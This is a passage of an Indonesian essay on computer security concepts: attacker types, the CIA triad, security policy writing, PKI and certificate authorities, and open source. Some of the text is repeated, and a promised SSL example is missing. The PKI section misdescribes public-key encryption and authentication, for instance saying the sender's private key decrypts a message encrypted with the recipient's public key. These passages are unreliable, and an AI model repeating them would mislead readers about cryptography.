apakah seseorang sudah membaca email atau sudah login ke mesinnya. Semuanya
hanya bertujuan rekan kerjanya dapat mengetahui dengan mudah mengenai
dirinya.
Perkembangan internet begitu pesat dan kini telah menjadi suatu jaringan raksasa
yang saling menghubungkan berbagai jaringan. Pemanfaatannya di bidang bisnis
menjadikan terjadinya pergeseran model. Dari bentukan komunitas pengguna
internet yang cenderung berupa suatu Gemainschaft dengan norma internal dan
tradisi yang diatur berdasarkan status dan didorong oleh kecintaan, kewajiban
serta kesamaan pemahaman dan tujuan, sekarang telah bergeser dan cenderung
menjadi suatu Gesselschaft yang terdiri dari individu (organisasi) yang memiliki
interest masing-masing yang saling berkompetisi untuk kepentingan material
sehingga berbentuk pasar bebas.
Pada bentuk pertama bisa dikatakan tak ada batasan antara privat dan publik,
sedang pada yang kedua terjadi perbedaan secara jelas. Dengan adanya
pergeseran tersebut dan makin banyaknya penggunaan eCommerce kebutuhan
akan sekuriti mulai tampak dengan jelas. Banyak perusahaan yang awalnya
menganggap remeh masalah ini akhirnya mengalami kerugian yang besar akibat
kelalaian ini.
Sekuriti komputer juga sudah sering dimanfaatkan untuk sarana iklan yang
seringkali memakan korban akibat kurangya pemahaman pengguna. Pertama
adalah issue firewall, lalu sistem deteksi intrusi, kemudian Virtual Private
Network (VPN), dan yang sekarang sering digunakan dalam produk yang
berkaitan dengan sekuriti adalah Certificate Authority (CA) dan Public Key
Infrastructure (PKI). Sehingga sering digunakan sebagai peralatan marketing
yang berujung pada pernyataan untuk membujuk pembeli :
‘‘Bila anda membeli produk A maka anda akan aman’’.
Tetapi kenyataannya tak seindah itu, terutama dalam era Internet yang serba cepat
ini. (Schneier, 1999). Sekuriti terbentuk dari suatu mata rantai yang akan
memiliki kekuatan sama dengan mata rantai yang terlemah. Sistem sekuriti
berbasiskan CA akan memiliki rantai yang tak seluruhnya hanya merupakakn
sistem kriptografi. Manusia akan banyak terlibat,
Sekuriti komputer memiliki definisi yang beragam, sebagai contoh berikut ini
adalah definisi sekuriti komputer yang sering digunakan (Gollmann, 1999) :
Computer security deals with the prevention and detection of
unauthorized actions by users of a computer system.
Tetapi dengan makin pentingnya eCommerce dan Internet, maka masalah sekuriti
tidak lagi sekedar masalah keamanan data belaka. Berikut ini dikutipkan salah
satu pernyataan Erkki Liikanen Commissioner for Enterprise and Information
Society European Commission yang disampaikan pada Information Security
Solutions Europe (ISSE 99), Berlin 14 October 1999. Berikut ini adalah cuplikan
utama :
1. Security is the key to securing users trust and confidence, and thus to
ensuring the further take-up of the Internet. This can only be achieved if
security features are incorporated in Internet services and if users have
sufficient safety guarantees
2. Securing the Internal Market is crucial to the further development of the
European security market, and thus of the European cryptographic
industry.This requires an evolution of mentalities: Regulation in this field
transcends national borders. Let’s "think European".
3. European governments and the Commission now have a converging view
on confidentiality. We see this in Council, in Member State policies and in
the constructive discussions we have. We must take this debate further and
focus of the potential of encryption to protect public security rather than
mainly seeing it as a threat to public order.
4. Finally, the promotion of open source systems in conjunction with
technology development is certainly one important step towards unlocking
the potential of the desktop security market for the European cryptographic
industry.
Jadi masalah sekuriti pada infrastruktur eCommerce dan Internet tidak saja
terletak pada masalah teknologi dan ekonomi saja, tetapi juga menyangkut
dengan keamanan suatu negara atau ketergantungan negara terhadap negara lain.
Bukan saja sistem sekuriti dengan teknologi yang aman, tetapi juga pertimbangan
bahwa pemanfaatan suatu teknologi tidak dibatasi oleh negera lain. Sebagai
contoh USA dengan ITAR-nya membatasi pemanfaatan jenis teknologi
kriptografi tertentu.
Pada prakteknya suatu pembentukan sistem yang aman akan mencoba melindungi
adanya beberapa kemungkinan serangan yang dapat dilakukan pihak lain
terhadap kita antara lain :
Intrusion. Pada penyerangan ini seorang penyerang akan dapat
menggunakan sistem komputer yang kita miliki. Sebagian penyerang jenis
ini menginginkan akses sebagaimana halnya pengguna yang memiliki hak
untuk mengakses sisttem.
Denial of services. Penyerangan jenis ini mengakibatkan pengguna yang
sah tak dapat mengakses sistem. Sebagai contoh adalah Distributed Denial
of Services (DDOS) yang mengakibatkan beberapa situs Internet tak bisa
diakses. Seringkali orang melupakan jenis serangan ini dan hanya
berkonsentrasi pada intrusion saja.
Joyrider. Pada serangan ini disebabkan oleh orang yang merasa iseng dan
ingin memperoleh kesenangan dengan cara menyerang suatu sistem.
Mereka masuk ke sistem karena beranggapan bahwa mungkin data yang di
dalamnya menarik. Rata-rata mereka karena rasa ingin tahu, tapi ada juga
yang menyebabkan kerusakan atau kehilangan data.
Vandal. Jenis serangan ini bertujuan untuk merusak sistem. Seringkali
ditujukan untuk site-site besar.
Scorekeeper. jenis serangan in hanyalah bertujuan untuk mendapatkan
reputasi dengan cara mengcrack sistem sebanyak mungkin. Sebagian besar
dari mereka tertarik pada situs-situs tertentu saja. Sebagian dari mereka tak
begitu peduli dengan data yang ada di dalamnya. Saat ini jenis ini lebih
dikenal dengan istilah script kiddies
Mata-mata. Jenis serangan ini bertujuan untuk memperoleh data atau
informasi rahasia dari pihak kompetitor. Saat ini semakin banyak
perusahaan yang memanfaatkan jasa ini.
Untuk menerapkan sekuriti, berbagai pihak pada dasarnya menggunakan
pendekatan berikut ini :
Tanpa sekuriti. Banyak orang tidak melakukan apa-apa yang berkaitan
dengan sekuriti, dengan kata lain hanya menerapkan sekuriti minimal (out
of the box, by default) yang disediakan oleh vendor. Jelas hal ini kuranglah
baik.
‘‘Security through obscurity’’ (security dengan cara penyembunyian) Pada
pendekatan ini sistem diasumsikan akan lebih aman bila tak ada orang yang
tahu mengenai sistem itu, misal keberadaannya, isinya, dan sebagainya.
Sayangnya hal tersebut kurang berarti di Internet, sekali suatu situs
terkoneksi ke Internet dengan cepat keberadaanya segera diketahui. Ada
juga yang berkeyakinan bahwa dengan menggunakan sistem yan tak
diketahui oleh umum maka dia akan memperoleh sistem yang lebih aman.
Host security. Pada pendekatan ini, maka tiap host pada sistem akan dibuat
secure. Permasalahan dari pendekatan ini adalah kompleksitas. Saat ini
relatif pada suatu organisasi besar memiliki sistem ang heterogen. Sehingga
proses menjadikan tiap host menjadi secure sangatlah kompleks.
Pendekatan ini cocok untuk kantor yang memiliki jumlah host yang sedikit.
Network security. Ketika sistem bertambah besar, maka menjaga
keamanan dengan memeriksa host demi host yang ada di sistem menjadi
tidak praktis. Dengan pendekatan sekuriti jaringan, maka usaha
dikonsentrasikan dengan mengontrol akses ke jaringan pada sistem.
Tetapi dengan bertambah besar dan terdistribusinya sistem komputer yang
dimiliki suatu organisasi maka pendekatan tersebut tidaklah mencukupi. Sehingga
perlu digunakan pendekatan sistem sekuriti yang berlapis. Yang perlu diingat,
adalah kenyataan bahwa tak ada satu model pun yang dapat memenuhi semua
kebutuhan dari sekuriti sistem yang kita inginkan. Sehingga kombinasi dari
berbagi pendekatan perlu dilakukan.
2. CIA dan 3M
Perlindungan data adalah hal yang penting dalam masalah sekuriti. Pada bahasan
sekuriti data didefinisikan sebagai :
Phsical phenomena chosen by convention to represent certain aspects
of our conceptual and real world. The meanings we assign to data are
called information. Data is used to transmit and store information
and to derive new information by manipulating the data according to
formal rules
Dengan definisi di atas, maka data dianggap merepresentasikan informasi. Pada
bahasan sistem sekuriti data dapat dikategorikan menjadi
Data publik, yaitu data yang dapat dikomunikasikan dengan siapa saja
Data rahasia, yaitu data yang tak boleh bocor ke tangan yang tak berhak
Sebarang data
Seringkali orang sering mempertimbangkan masalah akses yang tidak sah saja
dalam sekuriti. Sebetulnya hal yang perlu dipertimbangkan adalah lebih luas.
Dalam perancangan dan pembahasan sistem sekuriti kazimnya kita akan
dihadapkan pada pertimbangan yang dikenal dengan istilah segitiga CIA
Confidentiality, yang akan berkaitan dengan pencegahan akan
pengaksesan terjadap informasi yang dilakukan oleh pihak yang tak berhak.
Integrity. yang akan berkaitan dengan pencegahan akan modifikasi
informasi yang dilakukan oleh pihak yang tak berhak.
Availability, pencegahan akan penguasaan informasi atau sumber daya
oleh pihak yang tak berhak.
Disain suatu sistem sekuriti akan mencoba menyeimbangkan ke tiga hal di atas.
Confidentiality akan berkaitan dengan privacy (data personal) dan secrecy
(kerahasiaan). Privacy lebih berkaitan dengan data pribadi, sedang secrecy
terhadap data yang dimiliki oleh suatu organisasi. Kerahasiaan dan keamanan
saling berhubungan.
Secara umum integrity berkaitan dengan jaminan bahwa sesuatu berada dalam
kondisi seharusnya. Pada sekuriti ini akan berkaitan dengan proses pengubahan
data. Integrity didefinisikan oleh Clark and Wilson adalah :
No user of the system, even if authorized, may be permitted to modify
data items in such a way that asses or a accounting records of the
company are lost or corrupted.
Dalam Orange Book ( panduan untuk evaluasi sekuriti) didefinisikan data
integrity adalah :
The state that exists when computerized data is the same as that in the
source documents and has not been exposed to accidental or
malicious alteration or destruction.
Dalam hal ini jelas bahwa integrity berkaitan dengan konsistensi eksternal. Suatu
data yang disimpan dalam sistem komputer harus benar menggambarkan realita
yang ada di luar sistem komputer. Sedangkan dalam hal communication security,
integrity sendiri memiliki definsi sebagai :
The detection and correction of modification, insertion, deletion or
replay of transmitted data including both intentional manipulations
and random transmission errors.
Sedangkan availability didefinisikan oleh ISO 7498-2 adalah :
The property of being accessbile and useable upan demand by an
authorized entity.
Salah satu kasus yang sering terjadi pada aspek ini adalah adanya Denial of
Service, yang didefinisikan sebagia :
The prevention of authorized access to resources or the delaying the
time-critical operations.
Setiap user harus bertanggung jawab terhadap aksi yang dilakukan pada sistem .
Untuk itulah konsep accountability menjadi penting pada sistem komputer.
Accountability :
Audit information must be selectively kept and protected so that
action affecting security can be traced to the responsible party
Pada hakekatnya seringkali orang melupakan bahwa dalam pelaksanaan sekuriti
akan melibatkan 3 M yaitu :
Matematika
Manajemen
Manusia
Berikut ini akan dibahas lebih dalam mengenai pertimbangan tersebut.
2.1 Matematika
Since mathematics is the foundation of all digital advances, nations
well versed in that discipline - including China, India and the nations
of Southeast Asia - could turn their homelands into formidable
technology power
Pada penyusunan suatu sistem sekuriti tidak terlepas dari kebutuhan pemahaman
matematis yang mendasari penyusunan algoritma yang nantinya
diimplementasikan baik dalam bentuk perangkat keras ataupun lunak. Beberapa
konsep matematika yang sering dimanfaatkan misal :
Number theory, mendasari berbagai algoritma kriptografi seperti DES,
RSA dan lain sebagianya.
Formal model, digunakan untuk melakukan pengujian apakah suatu
protokol dapat dijamin keamanannya. Pengembangan dari berbagai jenis
kalkulus sepertri SPI Calculus (Abadi dan Gordon, 1999) lazim digunakan
untuk menganalisis suatu protokol yang digunakan untuk sekuriti. Metoda
formal matematis ini sering digunakan secara formal untuk membuktikan
celah yang ada pada protokol SSL (Abadi dan Needham, 1996), SSH dan
AKA (Abadi, 1997).
Beberapa model matematika untuk sekuriti telah dikembangkan antara lain :
Model Bell-LaPadula (BLP)
Model Harrison-Ruzzo-Ullman (HRU)
Model Chinesse Wall
Model Biba
Model Clark Wilson
Sistem kriptografi simetris menggunakan key yang sama baik untuk pengirim
data ataupun penerima data. Algoritma yang dikenal adalah DES, Blowfish.
Sistem kriptografi asimetris menggunakan dua buah key, yaitu public key dan
private key. Salah satu key akan diberi tahu kepada publik.
Matematika merupakan perangkat bantu analisis dalam masalah sekuriti. Sebagai
contoh berikut ini adalah penulisan protokol SSL yang memungkinkan pertukaran
session key antara Web server dan client.
2.2. Manajemen
The technology, however is only a tool.. it cannot solve social and
economic problem in the absence of social and economic policy.....
Technology cannot balance the budget, although with creative
thinking it can be used to improve the efficiency of government and
minimize the cost
Daniel Burnstein dan David Kline dalam Road Warrior
Pada dasarnya untuk membuat suatu sistem yang secure tidak lepas dari
bagaimana kita mengelola suatu sistem dengan baik. Sehingga persyaratan good
practice standard seperti Standard Operating Procedure (SOP) dan Security
Policy haruslah diterapkan di samping memikirkan hal teknologinya.
Suatu security policy sebaiknya berisi :
Penjelasan. Suatu kebijakan haruslah eksplisit dan jelas dipahami dan
menerangkan mengapa kebijakan tersebut diterapkan. Karena sebagian
besar orang cenderung tak mengikuti aturan bila tak diberikan alasannya.
Tanggung jawab tiap pihak yang terlibat Suatu kebijakan memaparkan
secara eksplist harapan dan tanggung jawab setiap pihak, pengguna,
pengelola dan pihak manajemen. Dengan cara ini dihindari harapan serta
melepaskan tanggung jawab pada pihak lain.
Bahasa yang biasa. Karena yang membaca dokumen ini adalah semua
pengguna, maka kebijakan harus ditulis dengan bahasa yang dipahami oleh
semua kalangan.
Otoritas yang menerapkan. Harus juga ditentukan tindakan yang perlu
dilakukan bila terjadi pihak yang tak mematuhi kebijakan tersebut.
Kebijakan juga harus menentukan siapa yang akan memutuskan mengenai
keputusan hukuman ketika terjadi pelanggaran.
Perkecualian. Tak ada kebijakan yang sempurna, terutama untuk
perubahan di masa mendatang. Sehingga perlu dilakukan penentuan
bilamana diperlukan suatu pengecualian. Siapa dan bagaimana yang
mendapat pengecualian tersebut.
Penilaian ulang. Karena sistem terus berevolusi, maka kebijakan perlu juga
direvisi pada masa mendatang. Sebagai contoh perubahan ukuran organisasi
(orang yang terlibat) akan menyebabkan perubahan policy ini juga.
Sebaiknya security policy TIDAK berisi hal berikuti ini :
Ditail teknis. Karena suatu kebijakan haryus menjelaskan apa yang akan
dilindungi dan mengapa, maka tidak perlu ditail teknis tentang bagaimana
melakukan hal tersebut dijabarkan. Akan lebih bermanfaat menuliskan
dokumen pendek yang dapat dipahami semua pihak daripada dokumen
panjang yang bersifat teknis yang hanya dipahami oleh bagiam teknis saja.
Permasalahan pihak lain. Setiap situs memiliki kebijakan yang berbeda
karena perbedaan contraint, pengguna, dan juga kemampuan. Kebijakan ini
juga berubah sejalan dengan waktu. Sehingga janganlah selalu sekedar
mengikuti kebijakan yang dilakukan oleh pihak lain belaka dalam membuat policy ini.
Masalah yang bukan merupakan masalah sekuriti komputer.
Seringkali permasalahan non sekuriti dianggap permasalahan sekuriti,
sebagi contoh pengguna menampilkan gambar porno (ini permasalahan
sumber daya manusia). Pengguna bermain game sepanjang hari juga bukan
masalah sekuriti (kecuali game tertentu yang memanfaatkan jaringan).
Sehingga batasan mana yang merupakan permasalah sekurit dan mana yang
bukan harus cukup dijelaskan.
Berikut ini adalah contoh suatu policy yang kurang cocok (sengaja ditulis dalam
kutipan aslinya) :
OTP will be used for all incoming connections
Policy di atas terlalu spesifik dan teknis, sehingga sulit untuk dipahami, sehingga
seringkali tak diterapkan. Berikut ini adalah perbaikan :
Nonreusable passwords shall be used to authenticate all incoming
connections from the outside world, in order to prevent potential
attackers from being able to capture reusable passwords by
monitoring such connections.
Policy di atas sudah lebih baik karena telah menjelaskan APA yang harus
dilindungi, dan MENGAPA. Policy tersebut tetap memberikan opsi terbuka
BAGAIMANA hal tersebut diimplementasikan, sehingga staf teknis dapat
memilih implementasi yang terbaik. Policy di atas dapat ditulis lebih baik
menjadi :
Regular passwords are often stolen and reused when they pass across
networks. We won’t use passwords that can be reused across
networks our company doesn’t control.
Policy hanya memberikan panduan dalam implementasi tapi tak menjelaskan
secara speisifik implementasi yang dilakukan.
Sangat sulit untuk menentukan suatu guideline seragam yang berkaitan dengan
sekuritini ini. Hal ini juga disebabkan oleh beragamnya bentuk organisasi yang
memanfaatkan IT. Akan tetapi berikut ini diberikan beberapa hal mendasar yang
sebaiknya disertakan dalam penulisan kebijakan sekuriti (security policy) :
Siapa saja yang diperkenankan memiliki account pada situs anda ? Apakah
ada account untuk guest ? Bagaimana dengan kontraktor, vendor dan client
yang terlibat dengan sistem anda ?
Apakah sebuah account dapat digunakan bersama oleh beberapa pengguna
? Bagaimana dengan sekretaris yang menggunakan account seorang
eksekutif untuk membaca emailnya ? Bagaimana dengan proyek bersama ?
Apakah penggunaan suatu workstation sebentar tergolong pemakaian
account bersama ?
Kapan seseorang dapat kehilangan hak atas accountnya, dan apa yang
dilakukan ?
Siapa yang dapat menggunakan modem dial in ? Apakah ada pertimbangan
khusus untuk line SLIP, PPP, atau ISDN ?
Apa yang harus dilakukan orang sebelum menghubungkan komputernya ke
jaringan utama ?
Bagaimana membuat komputer cukup aman sebelum komputer tersebut
memperoleh layanan dari mesin utama ?
Bagaimana membuat komputer aman agar dapat dikoneksikan jaringan
dengan akses tak terproteksi ke Internet
Bagimana data keuangan harus dilindungi ?
Bagimana informasi rahasia mengenai pegawai dilindungi ? Bagaimana
dengan kantor di negara lain yang berada di bawah hukum yang berbeda ?
Apakah yang perlu dilakukan oleh tiap orang untuk melindungi sistemnya ?
Bagaimana model password yang harus digunakan dan bagaimana proses
penggantiannya ?
Apakah tindakan pencegahan yang perlu dilakukan terhadap virus ?
Siapa yang dapat melakukan koneksi ke network eksternal ? Bagaimana
definisi network eksternal ini ? Apakah diperbolehkan seorang manajer
proyek menghubungkan network internal dengan situs lainnya ? Bagaimana
dengan koneksi dari partner bisnis ? Bagaimana koneksi lainnya ke Internet
?
Bagaimana komputer di rumah diamankan ? Bagaimana komputer tersebut
memperoleh akses yang aman ke jaringan kantor ?
Bagaimana pegawai yang sedang dalam perjalanan memperoleh akses yang
aman ke jaringan kantor ?
Informasi manakah yang tergolong informasi rahasia bagi suatu perusahaan
? Bagaimana informasi tersebut dilindungi ? Apakah boleh informasi
tersebut dikirm ke luar melalui e-mail ?
Apakah persyaratan untuk suatu sistem agar dapat melakukan electronic
commerce ?
Jika suatu kantor memiliki situs remote, bagaimana dibuat akses yang aman
ke jaringan utama di kantor pusat ?
Dalam mendisain sekuriti dapat dipakai 5 tahapan dasar berikut ini :
1. Pada aplikasi yang bersangkutan, manakah mekanisme proteksi difokuskan,
apakah pada data, operasi, atau pengguna
2. Pada layer manakah dari sistem komputer mekanisme sekuriti akan
ditempatkan ?
3. Mana yang lebih diinginkan kesederhanaan dan jaminan tinggi atau pada
sistem yang memiliki feature yang kaya.
4. Apakah tugas untuk mendefinisikan dan mengerapkan security harus
diberikan pada badan terpusat atau diberikan pada masing-masing individu
pada suatu sistem ?
5. Bagaimana dapat melindungi dari penyerang yang ingin meperoleh akses
pada sistem yang dilindungi mekanisme proteksi ?
2.3 Manusia
... we can make machines smarter and smarter, but their value will be
in how much smarter they make people
Doug Engelbart dalam Dr Dobb Journal
Manusia adalah salah satu faktor yang sangat penting tetap sering kali dilupakan
dalam pengembangan Teknologi Informasi. Begitu juga dalam mengembangkan
sistem sekuriti. Sebagai contoh karena penggunaan password yang sulit sehingga
menyebabkan pengguna malah menuliskannya pada kertas yang ditempel dekat
komputer. Sehingga dalam menyusun kebijakan sekuriti faktor manusia dan
budaya setempat haruslah sangat dipertimbangkan.
Seperti yang diungkapkan oleh Kevin Mitnick (seorang cracker yang terkenal),
sebagian besar celah diperoleh melalui rekayasa sosial yang menunjukkan
kelemahan pengguna. Saat ini di Indonesia masih banyak praktek dari pengguna
yang sangat mengabaikan faktor sekuriti (bahkan di bank pun masih
berlangsung). Banyak pengguna komputer yang tergolong sensitif (misal Bank)
saling menukar password, bahkan sering menuliskan password dan menempel di
dekat monitornya. Salah satu serangan yang sering dilakukan terhadap
kelengahan pengguna adalah kasus ‘‘impersonate’’ pada Internet Banking.
Komunitas internet yang tadinya merupakan komunitas sejenis (para ilmuwan)
yang berdasarkan rasa percaya dan keinginan berkolaborasi, kini menjadi
komunitas yang majemuk, dan penuh dengan orang asing. Sehingga mirip dengan
jalanan yang rawan akan tindak kejahatan. Hukum (apalagi di Indonesia)
sepertinya belum bisa mengikuti kecepatan perubahan internet. Sehingga langkah
paling tepat untuk melindungi sistem, adalah dari diri pengguna sendiri. Baik
secara aktif menjaga pesan yang dikirimkan, teliti dalam menerima pesan,
maupun berhati-hati dalam menggunakan fasilitas atau jasa di internet. Kasus
virus-worm seperti I LOVE U yang mengirimkan pesan seakan-akan dari
pengguna dengan tujuan yang ada di address book pengguna, sudah merupakan
suatu contoh nyata begitu mudahnya kasus pelanggaran keamanan dan pencurian
identitas dilakukan. Ini juga berawal dari ketakpedulian pengguna terhadap
permasalahan ini.
Sistem komputer client yang digunakan pengguna saat ini sering tidak dianggap
sebagai sumber kelemahan sistem sekuriti. Padahal ini salah satu penyebab
beberapa kasus keamanan. Untuk beberapa sistem yang mensyaratkan keamanan
(misal perbankan, data organisasi) maka perlu digunakan client yang memiliki
sistem log dan multi user yang baik. Sehinga accountibility dari tiap pengguna
akan tetap terjaga.
Pada dasarnya seorang pengguna memiliki tanggung jawab penggunaan sumber
daya komputasinya. Tanggung jawab ini berdasarkan konvensi yang berupa
(Ladkin, 1999) :
Legal, sebagai contoh tak mengancam orang lain, tak menyaru sebagai
orang lain, jangan merusak pekerjaan orang lain
Kontraktual, sebagai contoh tak bermain game, tak menulis email pribadi,
menjaga kontrak bisnis tetap bersifat rahasia.
Sosial, tak menunjukkan gambar porno, atau tak membaca email milik
orang lain.
3. PKI dan CA
Modern society is imposed not by the personal presence and brute
force of an elite caste but by the way each individual learns the art of
self-surveilance
Michel Foucault
Berikut ini akan dijelaskan secara singkat konsep dan prinsip dari Public Key
Infrastructure (PKI) serta peran Certificate Authority (CA).
3.1 Public Key Infrastructure
Perdagangan tradisional berbasiskan kertas dan ‘‘trust’’. Dalam perkembangan
perdagangan tradisional telah dikenal sistem EDI yang bersifat : secure, closed,
dan menggunakan sistem yang proprietary. Sedangkan saat ini eCommerce yang
menggunakan Internet relatif bersifat tak aman, open dan memanfaatkan open
system.
Di dunia Internet relatif sulit sekali memastikan apakah seseorang itu benar
personal yang dimaksud. Sehingga timbul permasalahan mendasar dalam
pemanfaatan eCommerce.
Authentication : untuk mengidentifikasi pihak yang terlibat. Dalam
perdagangan tradisional hal tersebut dilakukan dengan surat yang
ditanda-tangani.
Confidentiality : untuk menjaga informasi agar tetap privat. Dalam
perdagangan tradisional surat ditulis dalam amplop dan lalu ditanda-tangani
lalu di-‘‘seal’’.
Integrity: untuk melindungi manipulasi informasi. Hal ini dilakukan
pengiriman dengan surat tercatat, lalu dibuat salinannya dan dikirimkan dua
kali.
Non repudiation : untuk mencegah pengingkaran informasi oleh pemilik.
Hal ini dapat dilakukan dengan adanya saksi yang menguji keabsahan tanda
tangan tersebut.
Agar hal tersebut dapat tercapai dalam eCommerce maka perlu diterapkan
langkah-langkah :
Kriptografi standard (simetrik dan asimetrik). Kriptografi simetrik cepat,
aman tetapi memiliki permasalahan pengelolaan key. Asimetrik kriptografi
digunakan dalam public key kriptografi. Ada 2 key, private dan public key.
Private key disimpan sendiri, dan publik key didistribusikan. Bila publik
key digunakan untuk menenkripsi maka hanya private key yang dapat
mendekripsi. Begitu juga sebaliknya.
One way hashing. Menggunakan fungsi satu arah, dan tanpa key.
Digunakan untuk menghasilkan suatu sidik data khas terhadap suatu
kumpulan data. Digunakan untuk menentukan apakah suatu data telah
berubah.
Tanda tangan digital. Beberapa negara telah mensahkan penggunaan
tanda tangan digital dalam transaksi elektronis. Tanda tangan digital ini
akan menjamin otentikasi suatu dokumen.
Certificate Authority. Suatu sistem yang mengikat kepemilikan public key
dan pengguna sesungguhnya.
Langkah di atas dapat digunakan untuk membentuk ‘‘trust’’ dalam transaksi di
Internet :
Authentication : publik key digunakan untuk membuat digest dari pesan.
Hanya dengan menggunakan private key dari pengirim maka dapat
didekrip.
Confidentiality : Pesan dienkripsi dengan menggunakan publik key dari
penerima. Hanya dengan menggunakan private key dari pengirim pesan
dapat didekripsi.
Integrity: Membandingkan digest dengan tanda tangan digital yang
didekripsi.
Non repudiation : tanda tangan digital melakukan hal ini.
Key yang digunakan pada sistem kriptografi memegang peran yang sangat
penting.
Pseudo random number
Panjangnya key, semakin panjang semakin aman. Tetapi perlu diingat
bahwa membandingkan dua buah sistem kriptografi yang berbeda dengan
berdasarkan panjang keynya saja tidaklah cukup.
Private key harus disimpan secara aman baik dalam file (dengan PIN atau
passphrase) atau dengan smart card.
3.2 Certificate Authority
Does the fact that he sends out the correct answers to the questions
prove that he understands Chinese ?
John Searle mengenai Chinese Room Experiment
Penggunaan public key memang akan memudah proses manajemen key yang
digunakan dalam suatu eCommerce. Tetapi bagaimana mengetahui suatu publik
key adalah milik seseorang ? Untuk itu akan dimanfaatkan digital signature dan
Certifcate Authority (CA).
Suatu fungsi hash pada dasarnya adalah suatu fungsi sederhana yang tak bersifat
reversibel. Sehingga dengan mudah kita dapat menghasilkan suatu ‘‘signature’’
yang khas untuk tiap deretan data. Tetapi dari signature tersebut tak dapat
dilakukan pembalikan untuk memperoleh deretan data asli.
Suatu CA akan mengikat (bind) suatu publik key dengan pemiliknya. Melakukan
penyampulan untuk mendistribusikan publik key. CA yang dipercaya akan
melakukan tanda tangan digital untuk menguji kepemilikan kunci tersebut. Suatu
Certificate pada dasarnya akan berisi :
Keterangan ditail tentang pemilik
Keterangan tentang pihak yang mengeluarkan sertifikat (Certifier)
Publik key itu sendiri
Tanggal valid dan kedaluarsa
Tanda tangan digital sertifikat tersebut yang dilakukan oleh CA
Time stamp (penanda waktu)
Suatu CA akan melakukan beberapa hal mendasar :
Membuat sertifikat
Bertanggung jawab memvalidasi pemilik dari suatu public key.
Mendistribuskan CA dengan direktori server
Membuat Certification Revocation List (CRL)
Biasanya CA disediakan oleh suatu institusi yang dipercaya oleh publik, misal
suatu institusi pemerintah. Suatu Public Key Infrastructure akan terdiri dari :
Certification Authority (CA)
Registratraion Authority (RA)
Direktori
Aplikasi yang mendukung PKI !!!!!
Prosedur dan policy
Yang perlu dipahami adalah kenyataan bahwa biasanya dalam penyusunan PKI
maka akan melibatkan 20% teknologi dan 80% policy . PKI adalah salah satu
infrastructure eCommerce yang penting.
4. Open Source dan Security
Over the next decade the development of application software will
shift from the technological elite to the software proletariat
Scott Brown dalam The Future of Software
Dengan tersedianya source code para open source sering pihak merasa ragu akan
keamanan sistem tersebut. Sudah barang tentu pendekatan dengan konsep
security through obscurity ini kurang tepat. Pada saat ini Open Source merupakan
salah satu kandidat untuk penyediaan infrastruktur sistem yang aman. Tidak saja
aman dari sisi teknologi tapi juga dari sudut pandang ketergantungan suatu
negara. Beberapa negara di Eropa telah memutuskan pemanfaatan Open Source
dalam pembentukan infrastruktur eCommerce mereka.
Pemerintah Jerman melalui Bundesminister für Wirtschaft und Technologi
( BMWi ). menyatakan bahwa selama ini pengembangan infrastruktur Internet
sering dilakukan dengan menggunakan pendekatan security through obscurity.
Sehingga banyak orang menutup mata terhadap resiko yang mungkin terjadi pada
sistem operasi yang dominan. Berdasarkan alasan inilah maka BMWi mendukung
pengembangan Open Source, karena menjanjikan keamanan yang lebih baik.
Paling tidak memungkinkan para ekspert di luar perusahaan penyedia sistem
tersebut untuk memeriksa secara lebih seksama dan menyeluruh.
BMWi sejak tahun 1999 telah mulai mengembangkan komponen untuk sistem
sekuriti dengan perangkat lunak Open Source. Di samping itu, BMWi
menganggap Open Source menawarkan solusi yang lebih aman, lebih user
friendly dan inovasi yang lebih baik serta interoperabilitas yang baik dengan
produk lain. Dengan ketersediaan source code maka diharapkan para developer di
Jerman dapat bekerja lebih cepat tanpa bergantung pada vendor negara lain. Saat
ini telah banyak developer Open Source yang berasal dari Jerman. Menurut
perkiraan BMWi, Jerman pada tahun 2000 akan menghabiskan sekitar 200
milliard DM untuk kebutuhan komputer sehingga langkah-langkah penghematan
seperti penggunaan Open Source dan teknologi baru perlu dilakukan. Dukungan
pemerintah Jerman terhadap Open Source memang sungguh-sungguh tercermin
pada studi yang dilakukan der Koordinierungs- und Beratungsstelle der
Bundesregierung für Informationstechnik in der Bundesverwaltung (KBSt), yang
menyarankan penggunaan perangkat lunak Open Source di lingkungan
kementerian dalam negeri Jerman. Hal ini juga didukung oleh kajian Institut für
Rechtsfragen der Open Source Software suatu LSM yang memfokuskan pada
aspek hukum dari Open Source. Hal ini tak mengherankan sebab sejalan dengan
yang diutarakan oleh Erkki Liikanen - Commissioner for Enterprise and
Information Society European Commission yang disampaikan pada Information
Security Solutions Europe (ISSE 99), bahwa berdasarkan alasan keamanan dan
menghindari ketergantungan pada negara lain, maka sangat penting
mempertimbangkan penggunaan Open Source dalam teknologi kriptografi.
Negara-negara Eropa telah juga mengembangkan proyek yang dikenal dengan
nama Interworking Public Key Infrastructure for Europe. Proyek ini juga
berusaha mengembangkan teknologinya dengan pendekatan Open Source.
Dengan telah diakuinya secara hukum tanda tangan digital ini, maka sudah
saatnya Indonesia mempertimbangkan pembangunan PKi yang
mempertimbangkan aspek non teknis dan teknis secara lebih seksama.
1. Konsep security
Internet awalnya dikembangkan untuk menghubungkan antar pihak yang saling
dipercaya dengan tujuan saling bertukar menukar informasi. Walau merupakan
proyek Departemen Pertahanan Amerika, Internet digunakan dan dikembangkan
untuk tujuan kolaborasi dunia akademi yang serba terbuka. Sehingga pada awal
perkembangannya masalah privacy bukanlah merupakan hal yang besar. Bahkan
pada era awal Internet, sering dengan sengaja orang memberikan informasi
pribadinya kepada rekan kerjanya di benua lain. Saat itu pengguna sering
memberikan informasi mengenai dirinya melalui file .plan ataupun .project.
Juga melalui informasi yang didapat dari jasa finger yang dapat melaporkan
apakah seseorang sudah membaca email atau sudah login ke mesinnya. Semuanya
hanya bertujuan rekan kerjanya dapat mengetahui dengan mudah mengenai
dirinya.
Perkembangan internet begitu pesat dan kini telah menjadi suatu jaringan raksasa
yang saling menghubungkan berbagai jaringan. Pemanfaatannya di bidang bisnis
menjadikan terjadinya pergeseran model. Dari bentukan komunitas pengguna
internet yang cenderung berupa suatu Gemainschaft dengan norma internal dan
tradisi yang diatur berdasarkan status dan didorong oleh kecintaan, kewajiban
serta kesamaan pemahaman dan tujuan, sekarang telah bergeser dan cenderung
menjadi suatu Gesselschaft yang terdiri dari individu (organisasi) yang memiliki
interest masing-masing yang saling berkompetisi untuk kepentingan material
sehingga berbentuk pasar bebas.
Pada bentuk pertama bisa dikatakan tak ada batasan antara privat dan publik,
sedang pada yang kedua terjadi perbedaan secara jelas. Dengan adanya
pergeseran tersebut dan makin banyaknya penggunaan eCommerce kebutuhan
